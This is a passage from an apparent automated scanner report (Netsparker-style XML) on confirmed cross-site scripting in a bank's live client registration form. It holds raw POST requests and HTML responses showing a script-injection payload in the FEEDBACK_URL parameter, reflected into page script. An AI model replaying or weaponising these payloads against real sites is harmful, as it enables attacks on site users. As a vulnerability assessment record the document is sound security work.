&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00012E)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[serviceProvider]&quot;], &quot;BBAC47&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BFEEDBACK_URL%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00013B)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 300
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00013B)%3c%2fscript%3e&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
